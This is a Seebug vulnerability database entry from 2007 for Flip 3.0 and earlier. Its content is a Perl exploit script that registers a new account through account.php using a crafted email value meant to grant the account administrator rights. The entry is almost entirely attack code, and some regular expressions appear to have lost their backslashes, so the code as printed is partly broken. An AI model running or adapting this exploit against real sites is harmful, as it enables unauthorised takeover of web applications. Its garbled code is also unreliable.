Flip <= 3.0 Remoe Admin Creation Exploit

2007-09-20T00:00:00
ID SSV:7292
Type seebug
Reporter Root
Modified 2007-09-20T00:00:00

Description

No description provided by source.

                                        
                                            
                                                #!/usr/bin/perl

use strict; 
use IO::Socket;
use Getopt::Std;

my $app = "Flip <= 3.0";
my $type = "Admin Creation";
my $author = "undefined1_";
my $vendor = "http://sourceforge.net/projects/flipsource";

my %opt;
getopts("t:", \%opt);
$| = 1;
print ":: $app $type - by $author - www.undef1.com ::


";

my $url = $opt{t} || usage();

if($url =~ m/^(?:http://)(.*)/) {
	$url = $1;
}
if($url !~ m/^.*/$/) {
	$url .= "/";
}

print "username you want: ";
my $user = <STDIN>;
print "password you want: ";
my $pass = <STDIN>;
chomp($user);
chomp($pass);

create_admin($url, $user, $pass);

sub create_admin {
	my $url = shift;
	my $user = shift;
	my $pass = shift;
	
	print "creating admin ... 	";
	my $content  = "un=$user&em=aaa][3@gmail.com&pw1=$pass&pw2=$pass";
	my $data = "POST " . parse_page($url . "account.php?op=register") . " HTTP/1.1
";
	$data .= "Host: " . parse_host($url) . "
";
	$data .= "Connection: close
";
	$data .= "Content-Type: application/x-www-form-urlencoded
";
	$data .= "Content-Length: " . length($content) . "

";
	my $recv = sendpacket(parse_host($url), parse_port($url), $data.$content);

	if($recv !~ m/Successfully registered!/m) {
		print "failed
";
		return;
	}	
	print "OK
";		
}



# ======================================================

sub parse_host {
	my $url = shift;
	if($url =~ m/^([^/:]+).*//) {
		return $1;
}
	return "127.0.0.1";
}

sub parse_port {
	my $url = shift;
	if($url =~ m/^(?:[^/:]+):(d+)//) {
		return $1;
}
	return "80";
}

sub parse_page {
	my $url = shift;
	if($url =~ m/^(?:[^/]+)(/.*)/) {
		return $1;
	}
	return "/";
}


sub sendpacket {
	my $server = shift;
	my $port = shift;
	my $data = shift;

	my $sock = IO::Socket::INET->new(Proto => "tcp", PeerAddr => $server, PeerPort => $port) or die ":: Could not connect to $server:80 $!
";
	print $sock "$data";
	
	$data = "";
	my $resp;
	while($resp = <$sock>)	{ $data .= $resp; }
	
	close($sock);
	return $data;
}

sub usage() {
	printf "usage: %s -t<url>
", $0;
	exit;
}

# sebug.net